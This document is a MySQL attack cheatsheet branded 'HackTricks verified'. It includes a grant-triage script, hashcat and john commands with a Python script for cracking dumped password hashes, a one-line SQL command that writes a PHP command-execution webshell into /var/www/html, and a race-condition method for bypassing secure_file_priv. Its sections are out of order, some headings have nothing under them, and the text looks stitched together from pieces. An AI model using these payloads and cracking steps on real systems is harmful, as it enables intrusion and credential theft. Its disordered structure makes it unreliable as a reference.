Mysql Hacktricks Verified

Mastering MySQL Attacks: The Ultimate HackTricks Verified Cheatsheet


2.1 Check Existing Privileges

SELECT * FROM information_schema.user_privileges WHERE grantee LIKE '%youruser%';
SELECT * FROM mysql.user WHERE user='youruser'\G
SHOW GRANTS FOR CURRENT_USER();

Look for:

  • FILE – read/write files.
  • SUPER – disable logging, change replication.
  • INSERT on the mysql schema, together with FILE – load UDFs. CREATE FUNCTION ... SONAME inserts a row into mysql.func, and the shared library must first be written into plugin_dir, which is what FILE is for.
  • SELECT on mysql.user – dump password hashes (the authentication_string column in 5.7 and later, password in older versions).
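When you have many accounts to review, it helps to run the SHOW GRANTS output through a small triage script instead of reading it by eye. The following is an added example, not code from HackTricks or from this page; the grant lines are constructed sample data, the account names are made up, and the mapping from privileges to attack paths follows the list above (the UDF rule additionally assumes, per the MySQL documentation, that CREATE FUNCTION ... SONAME needs INSERT on the mysql schema plus FILE to place the library).

```python
import re

# Constructed sample: SHOW GRANTS output for a few accounts (not real data).
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'app'@'%'",
    "GRANT SELECT, INSERT ON `shop`.* TO 'app'@'%'",
    "GRANT FILE, SUPER ON *.* TO 'backup'@'localhost'",
    "GRANT SELECT ON `mysql`.`user` TO 'backup'@'localhost'",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT FILE ON *.* TO `loader`@`%`",
    "GRANT INSERT ON `mysql`.* TO `loader`@`%`",
]

# One GRANT line: privilege list, object, account. MySQL 8 quotes accounts with
# backticks, older versions with single quotes. Column-level grants such as
# SELECT (col1, col2) are not handled by the simple comma split below.
GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<object>\S+) TO "
    r"(?P<account>[`'][^`']+[`']@[`'][^`']+[`'])",
    re.IGNORECASE,
)

def parse_grants(lines):
    """Return {account: {(PRIVILEGE, object), ...}} from SHOW GRANTS output."""
    grants = {}
    for line in lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        account = m.group("account").replace("`", "'")   # normalise quoting
        obj = m.group("object").replace("`", "")
        for priv in m.group("privs").split(","):
            grants.setdefault(account, set()).add((priv.strip().upper(), obj))
    return grants

GLOBAL = ["*.*"]
MYSQL_DB = ["mysql.*"]

def holds(grants, account, priv, scopes):
    """True if the account has priv, or ALL PRIVILEGES, on any of the scopes."""
    held = grants.get(account, set())
    return any((p, s) in held for p in (priv, "ALL PRIVILEGES") for s in scopes)

def triage(grants):
    """Map each account to the attack paths its grants enable (same list as above)."""
    findings = {}
    for account in grants:
        paths = []
        has_file = holds(grants, account, "FILE", GLOBAL)
        if has_file:
            paths.append("FILE: read/write files (LOAD_FILE, INTO OUTFILE/DUMPFILE)")
        if holds(grants, account, "SUPER", GLOBAL):
            paths.append("SUPER: disable logging, change replication")
        # Loading a UDF needs INSERT on mysql.func (CREATE FUNCTION ... SONAME adds
        # a row there) plus FILE to drop the shared library into plugin_dir.
        if has_file and holds(grants, account, "INSERT", GLOBAL + MYSQL_DB + ["mysql.func"]):
            paths.append("UDF: CREATE FUNCTION ... SONAME to run native code")
        if holds(grants, account, "SELECT", GLOBAL + MYSQL_DB + ["mysql.user"]):
            paths.append("mysql.user: dump password hashes")
        findings[account] = paths
    return findings

if __name__ == "__main__":
    for account, paths in triage(parse_grants(SAMPLE_GRANTS)).items():
        print(account, "->", paths or ["nothing interesting"])
```

Feed it the concatenated SHOW GRANTS output of every account you can enumerate; an account with FILE but without INSERT on mysql.* (like the constructed 'backup' user) is a file-write target but not a UDF target, which is exactly the distinction that decides the next step.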

5.2 Cracking MySQL Hashes

  • mysql_native_password: the stored value is an asterisk followed by HEX(SHA1(SHA1(password))). Use hashcat -m 300 or john --format=mysql-sha1 (john's plain mysql format is for the old 16-character pre-4.1 hashes). Strip the leading asterisk before feeding the hash to hashcat.
  • caching_sha2_password (the MySQL 8 default): the stored value starts with $A$005$ and is a salted sha256crypt variant with 5000 rounds by default, so cracking is orders of magnitude slower. Use hashcat mode 7401 (MySQL $A$ sha256crypt, hashcat 6.2.5 or later); -m 7400 is generic sha256crypt and will not load these hashes.

Verified Hashcat command (hash.txt holds one 40-character hex hash per line, leading asterisk removed; add --username if the lines are in user:hash form):

hashcat -m 300 hash.txt /usr/share/wordlists/rockyou.txt
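Before spending GPU time it is worth confirming that what you pulled out of mysql.user is really a mysql_native_password hash and that you are feeding hashcat the right shape. The script below is an added example, not code from HackTricks or this page: it reproduces the mysql_native_password computation, converts dumped rows into hash.txt lines for hashcat -m 300 --username, and runs a tiny offline wordlist check that does the same comparison hashcat does. The sample rows are constructed (the first hash is the well-known PASSWORD('password') value, the second is computed here from a made-up password, the $A$ row is a placeholder shape, not a real hash), and passwords are assumed to be UTF-8 encoded.

```python
import hashlib

def native_hash(password: str) -> str:
    """What mysql_native_password stores: '*' + HEX(SHA1(SHA1(password)))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()   # raw 20 bytes, not hex
    return "*" + hashlib.sha1(inner).hexdigest().upper()

# Constructed sample rows, as if taken from
#   SELECT user, plugin, authentication_string FROM mysql.user;
# None of these are real credentials; the $A$ row only shows the format shape.
SAMPLE_ROWS = [
    ("app",    "mysql_native_password", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
    ("deploy", "mysql_native_password", native_hash("s3cret")),
    ("root",   "caching_sha2_password", "$A$005$" + "S" * 20 + "D" * 43),
]

def to_hashcat_300(stored: str) -> str:
    """hashcat -m 300 / john mysql-sha1 want the 40 hex chars without the leading '*'."""
    if len(stored) != 41 or stored[0] != "*":
        raise ValueError("not a mysql_native_password hash: %r" % stored)
    return stored[1:].lower()

def hashcat_lines(rows):
    """Build hash.txt lines in user:hash form for 'hashcat -m 300 --username'.
    caching_sha2_password rows ($A$...) are skipped: they are a different, much
    slower format (sha256crypt variant) and need mode 7401 and their own file."""
    lines = []
    for user, plugin, stored in rows:
        if plugin == "mysql_native_password":
            lines.append(f"{user}:{to_hashcat_300(stored)}")
    return lines

def crack_native(stored: str, candidates):
    """Offline wordlist check against one mysql_native_password hash.
    Returns the matching candidate or None; same comparison hashcat does in mode 300."""
    target = to_hashcat_300(stored)
    for pw in candidates:
        if to_hashcat_300(native_hash(pw)) == target:
            return pw
    return None

if __name__ == "__main__":
    for line in hashcat_lines(SAMPLE_ROWS):
        print(line)
    print(crack_native(SAMPLE_ROWS[0][2], ["123456", "letmein", "password"]))
```

A dump that contains only $A$ hashes means the server is on caching_sha2_password; in that case check for accounts still on the native plugin (the plugin column) before deciding whether cracking is worth the time.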

2. Writing Files (RCE / Webshell)

This is the pivot point for most MySQL attacks. Three things have to line up: your account needs the FILE privilege, the mysqld OS user must be able to write to the target directory, and secure_file_priv must permit the path. That variable has three states: NULL disables all file import and export, an empty string allows any path, and a directory value restricts reads and writes to that directory (the server compares paths after resolving symlinks). Check the server's secure_file_priv setting before trying anything; on Ubuntu-style installs an AppArmor profile for mysqld can additionally block writes outside the usual MySQL directories.

The HackTricks angle: if you know the web root path, you can write a PHP webshell (or any other script) straight into it:

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Why it's interesting:

  • The format pitfall: INTO OUTFILE writes the result as a text row, so it appends a newline (the default LINES TERMINATED BY) and escapes backslashes, tabs, newlines and NUL bytes inside the value. That mangles binaries such as UDF shared libraries but is harmless for text scripts like PHP, JSP or ASPX webshells, as long as the payload itself contains no backslashes. For binaries, or for any payload with backslashes in it, use SELECT ... INTO DUMPFILE, which writes a single value raw with no escaping and no terminator.
  • Permissions: the file is created by the mysqld OS user (typically mysql) and is world-readable, which is exactly what a webshell needs and exactly what a hardened server should prevent.
  • No overwrite: the target must not already exist; MySQL refuses to overwrite. That keeps you from clobbering system files, but it also means you need a fresh filename for every attempt, and each failed attempt that did create a file leaves evidence behind.

2. Privilege Escalation via MySQL Features

Once authenticated, the HackTricks material concentrates on MySQL's own features (file I/O, UDF loading, SUPER) to escalate privileges on the database server or on the underlying operating system. Look for:

Part 6: Post-Exploitation – Maintaining Access

5.1 Bypassing secure_file_priv via Race Conditions (Linux)

In some older MySQL/MariaDB builds a time-of-check/time-of-use race is claimed between the secure_file_priv path check (which resolves symlinks before comparing the path) and the actual opening of the file. It is not reliable on patched systems, but for CTFs the recipe is:

  • Create a symlink from a directory under the permitted path to the web root.
  • Issue SELECT ... INTO DUMPFILE and swap the path over to the symlink in the very short window between the check and the open. Keep in mind that INTO DUMPFILE refuses to write to an existing file, so what you race is the path that gets resolved, not the contents of an existing target file.